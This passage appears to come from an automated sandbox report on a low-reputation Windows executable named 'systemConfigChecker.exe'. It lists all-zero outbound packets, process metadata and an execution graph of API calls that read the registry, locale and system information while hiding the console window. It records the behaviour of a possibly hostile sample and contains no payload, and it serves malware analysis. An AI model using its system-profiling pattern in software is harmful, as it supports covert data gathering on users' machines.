            Dec 6, 2024 10:56:07.675375938 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 10:56:07.675452948 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:04:56:03
            Start date:06/12/2024
            Path:C:\Users\user\Desktop\systemConfigChecker.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\systemConfigChecker.exe"
            Imagebase:0x7ff64e130000
            File size:81'920 bytes
            MD5 hash:218954F9DD70247E51AF8A30940D5C33
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:04:56:03
            Start date:06/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff704000000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:31%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:39.3%
              Total number of Nodes:652
              Total number of Limit Nodes:6
              execution_graph 3760 7ff64e13b85c 3761 7ff64e13b87e 3760->3761 3762 7ff64e13b874 3760->3762 3763 7ff64e13b500 _Receive_impl free 3762->3763 3763->3761 3681 7ff64e1369e0 3682 7ff64e136a03 3681->3682 3683 7ff64e136a21 setvbuf 3682->3683 3684 7ff64e136a9f 3682->3684 3683->3684 3685 7ff64e136a2f ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3683->3685 3687 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3684->3687 3685->3684 3686 7ff64e136a51 _get_stream_buffer_pointers 3685->3686 3686->3684 3688 7ff64e136ace 3687->3688 3856 7ff64e136ae0 3857 7ff64e136b16 3856->3857 3858 7ff64e136b35 3856->3858 3859 7ff64e1388f0 10 API calls 3857->3859 3860 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3858->3860 3861 7ff64e136b1b 3859->3861 3862 7ff64e136bab 3860->3862 3861->3858 3863 7ff64e136b1f fsetpos 3861->3863 3863->3858 3764 7ff64e13c65e ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 3864 7ff64e13bae8 3867 7ff64e13c1bc 3864->3867 3868 7ff64e13c1df GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 3867->3868 3869 7ff64e13baf1 3867->3869 3868->3869 3693 7ff64e13cfed _seh_filter_exe 3175 7ff64e13b96c 3176 7ff64e13b985 3175->3176 3177 7ff64e13b98d __scrt_acquire_startup_lock 3176->3177 3178 7ff64e13bac3 3176->3178 3180 7ff64e13bacd 3177->3180 3185 7ff64e13b9ab __scrt_release_startup_lock 3177->3185 3363 7ff64e13bfac IsProcessorFeaturePresent 3178->3363 3181 7ff64e13bfac 9 API calls 3180->3181 3182 7ff64e13bad8 3181->3182 3184 7ff64e13bae0 _exit 3182->3184 3183 7ff64e13b9d0 3185->3183 3186 7ff64e13ba56 _get_initial_narrow_environment __p___argv __p___argc 3185->3186 3189 7ff64e13ba4e _register_thread_local_exe_atexit_callback 3185->3189 3195 7ff64e135d80 GetConsoleWindow ShowWindow 3186->3195 3189->3186 3192 7ff64e13ba83 3193 7ff64e13ba88 _cexit 3192->3193 3194 7ff64e13ba8d 3192->3194 3193->3194 3194->3183 3369 7ff64e139610 3195->3369 3197 7ff64e135e03 3373 7ff64e134a40 3197->3373 3201 7ff64e135e1a 3202 7ff64e135e5b 3201->3202 3203 7ff64e135e56 3201->3203 3205 7ff64e135e4f _invalid_parameter_noinfo_noreturn 3201->3205 3204 7ff64e139610 memcpy 3202->3204 3495 7ff64e13b500 3203->3495 3207 7ff64e135e71 3204->3207 3205->3203 3422 7ff64e134640 GetLocaleInfoA 3207->3422 3210 7ff64e1383c0 memcpy 3211 7ff64e135e88 3210->3211 3212 7ff64e135ec9 3211->3212 3214 7ff64e135ec4 3211->3214 3216 7ff64e135ebd _invalid_parameter_noinfo_noreturn 3211->3216 3213 7ff64e139610 memcpy 3212->3213 3215 7ff64e135edf 3213->3215 3217 7ff64e13b500 _Receive_impl free 3214->3217 3458 7ff64e133560 GetSystemInfo memset 3215->3458 3216->3214 3217->3212 3220 7ff64e1383c0 memcpy 3221 7ff64e135ef6 3220->3221 3222 7ff64e135f37 3221->3222 3223 7ff64e135f32 3221->3223 3225 7ff64e135f2b _invalid_parameter_noinfo_noreturn 3221->3225 3224 7ff64e139610 memcpy 3222->3224 3226 7ff64e13b500 _Receive_impl free 3223->3226 3227 7ff64e135f4d GlobalMemoryStatusEx memset 3224->3227 3225->3223 3226->3222 3475 7ff64e136810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3227->3475 3229 7ff64e135f7a 3476 7ff64e1399f0 3229->3476 3232 7ff64e1399f0 9 API calls 3233 7ff64e135faf 3232->3233 3234 7ff64e136048 3233->3234 3498 7ff64e1396c0 3233->3498 3490 7ff64e137c10 3234->3490 3237 7ff64e136078 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3238 7ff64e1383c0 memcpy 3237->3238 3239 7ff64e13609e 3238->3239 3240 7ff64e1360dc 3239->3240 3242 7ff64e13676e _invalid_parameter_noinfo_noreturn 3239->3242 3243 7ff64e13b500 _Receive_impl free 3239->3243 3241 7ff64e139610 memcpy 3240->3241 3244 7ff64e1360f2 3241->3244 3246 7ff64e136775 3242->3246 3243->3240 3245 7ff64e133780 48 API calls 3244->3245 3248 7ff64e1360fc 3245->3248 3247 7ff64e13b500 _Receive_impl free 3246->3247 3250 7ff64e13677a 3247->3250 3249 7ff64e1383c0 memcpy 3248->3249 3252 7ff64e136109 3249->3252 3251 7ff64e1367cc 3250->3251 3253 7ff64e1367c7 3250->3253 3257 7ff64e1367c0 _invalid_parameter_noinfo_noreturn 3250->3257 3254 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3251->3254 3255 7ff64e13614a 3252->3255 3256 7ff64e136145 3252->3256 3261 7ff64e13613e _invalid_parameter_noinfo_noreturn 3252->3261 3259 7ff64e13b500 _Receive_impl free 3253->3259 3260 7ff64e1367dd 3254->3260 3258 7ff64e139610 memcpy 3255->3258 3262 7ff64e13b500 _Receive_impl free 3256->3262 3257->3253 3263 7ff64e136160 3258->3263 3259->3251 3361 7ff64e13c0fc GetModuleHandleW 3260->3361 3261->3256 3262->3255 3264 7ff64e133aa0 38 API calls 3263->3264 3265 7ff64e13616a 3264->3265 3266 7ff64e1383c0 memcpy 3265->3266 3267 7ff64e136177 3266->3267 3268 7ff64e1361b8 3267->3268 3270 7ff64e1361b3 3267->3270 3272 7ff64e1361ac _invalid_parameter_noinfo_noreturn 3267->3272 3269 7ff64e134e50 28 API calls 3268->3269 3271 7ff64e1361c1 3269->3271 3273 7ff64e13b500 _Receive_impl free 3270->3273 3274 7ff64e1367fe 3271->3274 3281 7ff64e1361e0 3271->3281 3272->3270 3273->3268 3276 7ff64e131310 ?_Xlength_error@std@@YAXPEBD 3274->3276 3275 7ff64e136288 memcpy 3277 7ff64e139610 memcpy 3275->3277 3279 7ff64e136803 3276->3279 3280 7ff64e1362d9 3277->3280 3278 7ff64e13621b 3283 7ff64e13b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3278->3283 3286 7ff64e131270 Concurrency::cancel_current_task __std_exception_copy 3279->3286 3282 7ff64e1383c0 memcpy 3280->3282 3281->3275 3281->3278 3284 7ff64e13627c 3281->3284 3285 7ff64e13626d 3281->3285 3289 7ff64e136234 3281->3289 3288 7ff64e13630b 3282->3288 3283->3289 3287 7ff64e13b508 std::_Facet_Register __std_exception_copy malloc _CxxThrowException 3284->3287 3285->3278 3285->3279 3290 7ff64e136809 3286->3290 3287->3289 3291 7ff64e13634c 3288->3291 3294 7ff64e136347 3288->3294 3298 7ff64e136340 _invalid_parameter_noinfo_noreturn 3288->3298 3289->3275 3292 7ff64e13637f _invalid_parameter_noinfo_noreturn 3289->3292 3291->3292 3293 7ff64e136386 3291->3293 3295 7ff64e13638b 3291->3295 3292->3293 3296 7ff64e13b500 _Receive_impl free 3293->3296 3299 7ff64e13b500 _Receive_impl free 3294->3299 3297 7ff64e139610 memcpy 3295->3297 3296->3295 3300 7ff64e1363a1 3297->3300 3298->3294 3299->3291 3301 7ff64e133cd0 59 API calls 3300->3301 3302 7ff64e1363ab 3301->3302 3303 7ff64e1383c0 memcpy 3302->3303 3304 7ff64e1363b8 3303->3304 3305 7ff64e1363f9 3304->3305 3307 7ff64e1363f4 3304->3307 3309 7ff64e1363ed _invalid_parameter_noinfo_noreturn 3304->3309 3306 7ff64e139610 memcpy 3305->3306 3308 7ff64e13640f 3306->3308 3310 7ff64e13b500 _Receive_impl free 3307->3310 3311 7ff64e133f60 58 API calls 3308->3311 3309->3307 3310->3305 3312 7ff64e136419 3311->3312 3313 7ff64e1383c0 memcpy 3312->3313 3314 7ff64e136426 3313->3314 3315 7ff64e136467 3314->3315 3316 7ff64e136462 3314->3316 3318 7ff64e13645b _invalid_parameter_noinfo_noreturn 3314->3318 3317 7ff64e134180 58 API calls 3315->3317 3319 7ff64e13b500 _Receive_impl free 3316->3319 3320 7ff64e136471 3317->3320 3318->3316 3319->3315 3321 7ff64e1383c0 memcpy 3320->3321 3322 7ff64e13647e 3321->3322 3323 7ff64e1364bf memset 3322->3323 3324 7ff64e1364ba 3322->3324 3326 7ff64e1364b3 _invalid_parameter_noinfo_noreturn 3322->3326 3325 7ff64e136810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3323->3325 3327 7ff64e13b500 _Receive_impl free 3324->3327 3328 7ff64e1364d9 GetModuleFileNameA 3325->3328 3326->3324 3327->3323 3329 7ff64e1399f0 9 API calls 3328->3329 3330 7ff64e1364ff 3329->3330 3331 7ff64e1399f0 9 API calls 3330->3331 3332 7ff64e13650e 3331->3332 3333 7ff64e1399f0 9 API calls 3332->3333 3334 7ff64e13651d 3333->3334 3335 7ff64e1365b6 3334->3335 3336 7ff64e1396c0 8 API calls 3334->3336 3337 7ff64e137c10 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3335->3337 3336->3335 3338 7ff64e1365df ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3337->3338 3339 7ff64e1383c0 memcpy 3338->3339 3340 7ff64e136605 3339->3340 3341 7ff64e136643 3340->3341 3343 7ff64e13672c _invalid_parameter_noinfo_noreturn 3340->3343 3344 7ff64e13b500 _Receive_impl free 3340->3344 3342 7ff64e139610 memcpy 3341->3342 3345 7ff64e136659 3342->3345 3347 7ff64e136733 3343->3347 3344->3341 3346 7ff64e134390 42 API calls 3345->3346 3348 7ff64e136663 3346->3348 3349 7ff64e13b500 _Receive_impl free 3347->3349 3350 7ff64e1383c0 memcpy 3348->3350 3354 7ff64e13673b 3349->3354 3351 7ff64e136670 3350->3351 3352 7ff64e1366b1 3351->3352 3353 7ff64e1366ac 3351->3353 3357 7ff64e1366a5 _invalid_parameter_noinfo_noreturn 3351->3357 3355 7ff64e135510 51 API calls 3352->3355 3358 7ff64e13b500 _Receive_impl free 3353->3358 3354->3242 3354->3246 3354->3250 3356 7ff64e1366c7 3355->3356 3359 7ff64e131b50 175 API calls 3356->3359 3357->3353 3358->3352 3360 7ff64e1366ea 3359->3360 3360->3343 3360->3347 3360->3354 3362 7ff64e13ba7f 3361->3362 3362->3182 3362->3192 3364 7ff64e13bfd2 3363->3364 3365 7ff64e13bfe0 memset RtlCaptureContext RtlLookupFunctionEntry 3364->3365 3366 7ff64e13c056 memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3365->3366 3367 7ff64e13c01a RtlVirtualUnwind 3365->3367 3368 7ff64e13c0d6 3366->3368 3367->3366 3368->3180 3370 7ff64e139633 memcpy 3369->3370 3371 7ff64e139672 3369->3371 3370->3197 3371->3197 3518 7ff64e13c530 3373->3518 3377 7ff64e134af1 RegOpenKeyExA 3378 7ff64e134b97 RegOpenKeyExA 3377->3378 3379 7ff64e134b1d RegGetValueA 3377->3379 3382 7ff64e134c3c RegOpenKeyExA 3378->3382 3383 7ff64e134bc2 RegGetValueA 3378->3383 3380 7ff64e134b56 3379->3380 3381 7ff64e134b84 RegCloseKey 3379->3381 3384 7ff64e1399f0 9 API calls 3380->3384 3381->3378 3385 7ff64e134c6b RegGetValueA 3382->3385 3397 7ff64e134d4c 3382->3397 3386 7ff64e134c29 RegCloseKey 3383->3386 3387 7ff64e134bfb 3383->3387 3388 7ff64e134b66 3384->3388 3389 7ff64e134ca4 3385->3389 3390 7ff64e134cd2 RegGetValueA 3385->3390 3386->3382 3391 7ff64e1399f0 9 API calls 3387->3391 3392 7ff64e1399f0 9 API calls 3388->3392 3393 7ff64e1399f0 9 API calls 3389->3393 3394 7ff64e134d39 RegCloseKey 3390->3394 3395 7ff64e134d0b 3390->3395 3396 7ff64e134c0b 3391->3396 3398 7ff64e134b75 3392->3398 3399 7ff64e134cb4 3393->3399 3394->3397 3400 7ff64e1399f0 9 API calls 3395->3400 3401 7ff64e1399f0 9 API calls 3396->3401 3404 7ff64e134dd9 3397->3404 3408 7ff64e1396c0 8 API calls 3397->3408 3402 7ff64e1399f0 9 API calls 3398->3402 3403 7ff64e1399f0 9 API calls 3399->3403 3405 7ff64e134d1b 3400->3405 3406 7ff64e134c1a 3401->3406 3402->3381 3407 7ff64e134cc3 3403->3407 3409 7ff64e137c10 _Receive_impl 3 API calls 3404->3409 3410 7ff64e1399f0 9 API calls 3405->3410 3411 7ff64e1399f0 9 API calls 3406->3411 3412 7ff64e1399f0 9 API calls 3407->3412 3408->3404 3413 7ff64e134e0b ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3409->3413 3414 7ff64e134d2a 3410->3414 3411->3386 3412->3390 3521 7ff64e13b4e0 3413->3521 3416 7ff64e1399f0 9 API calls 3414->3416 3416->3394 3418 7ff64e1383c0 3420 7ff64e1383d7 3418->3420 3419 7ff64e138433 3419->3201 3420->3419 3421 7ff64e13840a memcpy 3420->3421 3421->3201 3423 7ff64e1346c7 3422->3423 3424 7ff64e1346a2 3422->3424 3427 7ff64e13a0c0 7 API calls 3423->3427 3535 7ff64e13a0c0 3424->3535 3426 7ff64e1346c2 3428 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3426->3428 3429 7ff64e1346ff GetLocaleInfoA 3427->3429 3430 7ff64e134797 3428->3430 3431 7ff64e134728 3429->3431 3432 7ff64e1347b0 3429->3432 3430->3210 3433 7ff64e13a0c0 7 API calls 3431->3433 3434 7ff64e13a0c0 7 API calls 3432->3434 3455 7ff64e134748 3433->3455 3435 7ff64e1347e3 memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3434->3435 3437 7ff64e1399f0 9 API calls 3435->3437 3436 7ff64e134780 3439 7ff64e13b500 _Receive_impl free 3436->3439 3440 7ff64e13487e 3437->3440 3438 7ff64e134a33 _invalid_parameter_noinfo_noreturn 3439->3426 3552 7ff64e13b250 3440->3552 3443 7ff64e1399f0 9 API calls 3444 7ff64e1348a9 3443->3444 3445 7ff64e13b250 9 API calls 3444->3445 3446 7ff64e1348c7 3445->3446 3447 7ff64e1399f0 9 API calls 3446->3447 3448 7ff64e1348d6 3447->3448 3449 7ff64e134963 3448->3449 3450 7ff64e1396c0 8 API calls 3448->3450 3451 7ff64e137c10 _Receive_impl 3 API calls 3449->3451 3450->3449 3452 7ff64e13498c ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3451->3452 3453 7ff64e1349ac 3452->3453 3452->3455 3454 7ff64e1349dc 3453->3454 3456 7ff64e1349d5 _invalid_parameter_noinfo_noreturn 3453->3456 3457 7ff64e13b500 _Receive_impl free 3454->3457 3455->3426 3455->3436 3455->3438 3456->3454 3457->3455 3583 7ff64e136810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3458->3583 3460 7ff64e1335be 3461 7ff64e1399f0 9 API calls 3460->3461 3462 7ff64e1335cf ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G 3461->3462 3463 7ff64e1399f0 9 API calls 3462->3463 3464 7ff64e1335ec 3463->3464 3465 7ff64e1399f0 9 API calls 3464->3465 3466 7ff64e1335fc ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3465->3466 3467 7ff64e1399f0 9 API calls 3466->3467 3468 7ff64e133618 3467->3468 3469 7ff64e1336a6 3468->3469 3470 7ff64e1396c0 8 API calls 3468->3470 3471 7ff64e137c10 _Receive_impl 3 API calls 3469->3471 3470->3469 3472 7ff64e1336d8 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3471->3472 3473 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3472->3473 3474 7ff64e1336fe 3473->3474 3474->3220 3475->3229 3480 7ff64e139a20 ?good@ios_base@std@ 3476->3480 3478 7ff64e139aa1 3481 7ff64e139aab ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3478->3481 3484 7ff64e139afd ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3478->3484 3488 7ff64e139ad5 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3478->3488 3479 7ff64e139a73 3479->3478 3482 7ff64e139a89 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3479->3482 3480->3478 3480->3479 3485 7ff64e139b8d ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3481->3485 3487 7ff64e135f94 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3481->3487 3482->3478 3484->3481 3486 7ff64e139b1a 3484->3486 3485->3487 3486->3481 3489 7ff64e139b25 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3486->3489 3487->3232 3488->3478 3488->3481 3489->3481 3489->3486 3491 7ff64e137c7f ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3490->3491 3493 7ff64e137c29 3490->3493 3492 7ff64e137cc0 _invalid_parameter_noinfo_noreturn 3491->3492 3493->3492 3494 7ff64e13b500 _Receive_impl free 3493->3494 3494->3491 3496 7ff64e13bc7c free 3495->3496 3499 7ff64e1396dd memcpy 3498->3499 3503 7ff64e139707 3498->3503 3499->3234 3500 7ff64e13980c 3584 7ff64e131310 ?_Xlength_error@std@@YAXPEBD 3500->3584 3503->3500 3507 7ff64e139799 3503->3507 3508 7ff64e139761 3503->3508 3509 7ff64e139753 3503->3509 3504 7ff64e139811 3510 7ff64e131270 Concurrency::cancel_current_task __std_exception_copy 3504->3510 3505 7ff64e13b508 std::_Facet_Register 3 API calls 3505->3509 3506 7ff64e1397a1 memcpy 3511 7ff64e1397ef 3506->3511 3516 7ff64e1397c2 3506->3516 3514 7ff64e13b508 std::_Facet_Register 3 API calls 3507->3514 3508->3504 3508->3505 3509->3506 3512 7ff64e139805 _invalid_parameter_noinfo_noreturn 3509->3512 3513 7ff64e139817 3510->3513 3511->3234 3512->3500 3514->3509 3515 7ff64e1397e7 3517 7ff64e13b500 _Receive_impl free 3515->3517 3516->3512 3516->3515 3517->3511 3519 7ff64e134a5d memset memset memset memset memset 3518->3519 3520 7ff64e136810 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3519->3520 3520->3377 3522 7ff64e13b4e9 3521->3522 3523 7ff64e134e31 3522->3523 3524 7ff64e13bb34 IsProcessorFeaturePresent 3522->3524 3523->3418 3525 7ff64e13bb4c 3524->3525 3530 7ff64e13bc08 RtlCaptureContext 3525->3530 3531 7ff64e13bc22 RtlLookupFunctionEntry 3530->3531 3532 7ff64e13bc38 RtlVirtualUnwind 3531->3532 3533 7ff64e13bb5f 3531->3533 3532->3531 3532->3533 3534 7ff64e13bb00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3533->3534 3536 7ff64e13a0e6 3535->3536 3537 7ff64e13a1b0 3535->3537 3538 7ff64e13a0ec memcpy 3536->3538 3539 7ff64e13a10b 3536->3539 3575 7ff64e131310 ?_Xlength_error@std@@YAXPEBD 3537->3575 3538->3426 3541 7ff64e13a1b5 3539->3541 3545 7ff64e13a17c 3539->3545 3549 7ff64e13a11c 3539->3549 3550 7ff64e13a137 memcpy 3539->3550 3576 7ff64e131270 3541->3576 3546 7ff64e13b508 std::_Facet_Register 3 API calls 3545->3546 3546->3550 3548 7ff64e13a1bb 3566 7ff64e13b508 3549->3566 3550->3426 3551 7ff64e13a175 _invalid_parameter_noinfo_noreturn 3551->3545 3554 7ff64e13b286 ?good@ios_base@std@ 3552->3554 3555 7ff64e13b2bf 3554->3555 3556 7ff64e13b2ed 3554->3556 3555->3556 3558 7ff64e13b2d5 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 3555->3558 3557 7ff64e13b2f7 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3556->3557 3560 7ff64e13b347 ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J 3556->3560 3561 7ff64e13b31b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3556->3561 3563 7ff64e13489a 3557->3563 3564 7ff64e13b3d1 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3557->3564 3558->3556 3560->3557 3562 7ff64e13b337 3560->3562 3561->3556 3561->3562 3562->3557 3565 7ff64e13b369 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 3562->3565 3563->3443 3564->3563 3565->3557 3565->3562 3567 7ff64e13b522 malloc 3566->3567 3568 7ff64e13a132 3567->3568 3569 7ff64e13b513 3567->3569 3568->3550 3568->3551 3569->3567 3570 7ff64e13b532 3569->3570 3573 7ff64e13b53d 3570->3573 3579 7ff64e13bca4 3570->3579 3572 7ff64e131270 Concurrency::cancel_current_task __std_exception_copy 3574 7ff64e13b543 3572->3574 3573->3572 3577 7ff64e13127e Concurrency::cancel_current_task 3576->3577 3578 7ff64e13128f __std_exception_copy 3577->3578 3578->3548 3582 7ff64e13bc84 3579->3582 3581 7ff64e13bcb2 _CxxThrowException 3582->3581 3583->3460 3627 7ff64e131170 __std_exception_copy 3871 7ff64e136ef0 3872 7ff64e136f27 3871->3872 3874 7ff64e136fbe fgetc 3872->3874 3875 7ff64e136fa2 fgetc 3872->3875 3877 7ff64e136f37 3872->3877 3873 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3876 7ff64e1371ab 3873->3876 3881 7ff64e1370f0 3874->3881 3882 7ff64e136feb 3874->3882 3875->3877 3877->3873 3878 7ff64e13702a ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3878->3882 3880 7ff64e137198 3883 7ff64e13b500 _Receive_impl free 3880->3883 3881->3877 3881->3880 3884 7ff64e13712f _invalid_parameter_noinfo_noreturn 3881->3884 3882->3878 3882->3881 3885 7ff64e13709d memcpy fgetc 3882->3885 3887 7ff64e13714e 3882->3887 3888 7ff64e13a570 3882->3888 3883->3877 3884->3881 3885->3881 3885->3882 3886 7ff64e137170 ungetc 3886->3881 3886->3887 3887->3881 3887->3886 3889 7ff64e13a6c5 3888->3889 3906 7ff64e131310 ?_Xlength_error@std@@YAXPEBD 3889->3906 3907 7ff64e1374f0 3908 7ff64e1374fc _unlock_file 3907->3908 3909 7ff64e137503 3907->3909 3908->3909 3621 7ff64e139df0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3765 7ff64e138670 3770 7ff64e137530 3765->3770 3773 7ff64e13754d 3770->3773 3771 7ff64e1375f5 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3772 7ff64e1375cc ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3772->3771 3773->3771 3773->3772 3774 7ff64e1388f0 10 API calls 3773->3774 3775 7ff64e1375bf fclose 3774->3775 3775->3772 3776 7ff64e138870 3781 7ff64e138120 3776->3781 3778 7ff64e138884 3779 7ff64e138896 3778->3779 3780 7ff64e13b500 _Receive_impl free 3778->3780 3780->3779 3782 7ff64e138177 3781->3782 3783 7ff64e138141 3781->3783 3784 7ff64e1381c0 3782->3784 3785 7ff64e1381fd _invalid_parameter_noinfo_noreturn 3782->3785 3787 7ff64e1381b8 3782->3787 3783->3785 3786 7ff64e13b500 _Receive_impl free 3783->3786 3784->3778 3788 7ff64e138254 3785->3788 3789 7ff64e138223 3785->3789 3786->3782 3790 7ff64e13b500 _Receive_impl free 3787->3790 3788->3778 3791 7ff64e13824c 3789->3791 3792 7ff64e13826b _invalid_parameter_noinfo_noreturn 3789->3792 3790->3784 3793 7ff64e13b500 _Receive_impl free 3791->3793 3793->3788 3628 7ff64e139974 3629 7ff64e139982 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N ?uncaught_exception@std@ 3628->3629 3630 7ff64e1399b2 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3629->3630 3631 7ff64e1399bc 3629->3631 3630->3631 3596 7ff64e136bc0 3597 7ff64e136bf3 3596->3597 3599 7ff64e136c51 3597->3599 3605 7ff64e1388f0 3597->3605 3601 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3599->3601 3600 7ff64e136c16 3600->3599 3603 7ff64e136c24 _fseeki64 3600->3603 3604 7ff64e136c3b fgetpos 3600->3604 3602 7ff64e136cbb 3601->3602 3603->3599 3603->3604 3604->3599 3606 7ff64e1389c3 3605->3606 3607 7ff64e138913 3605->3607 3608 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3606->3608 3607->3606 3609 7ff64e13891d 3607->3609 3610 7ff64e1389d2 3608->3610 3611 7ff64e138936 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3609->3611 3613 7ff64e138961 3609->3613 3610->3600 3612 7ff64e13895c 3611->3612 3612->3613 3616 7ff64e138997 fwrite 3612->3616 3614 7ff64e13b4e0 Concurrency::cancel_current_task 8 API calls 3613->3614 3615 7ff64e13897e 3614->3615 3615->3600 3616->3613 3698 7ff64e1317c0 3699 7ff64e137c10 _Receive_impl 3 API calls 3698->3699 3700 7ff64e131802 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3699->3700 3795 7ff64e137240 3796 7ff64e13725b 3795->3796 3797 7ff64e1372ab ungetc 3796->3797 3798 7ff64e137271 3796->3798 3797->3798 3632 7ff64e13c948 3633 7ff64e13c968 3632->3633 3634 7ff64e13c95b 3632->3634 3636 7ff64e138450 3634->3636 3637 7ff64e13848f 3636->3637 3638 7ff64e138463 3636->3638 3637->3633 3639 7ff64e1384a8 _invalid_parameter_noinfo_noreturn 3638->3639 3640 7ff64e138487 3638->3640 3641 7ff64e13b500 _Receive_impl free 3640->3641 3641->3637 3701 7ff64e1311d0 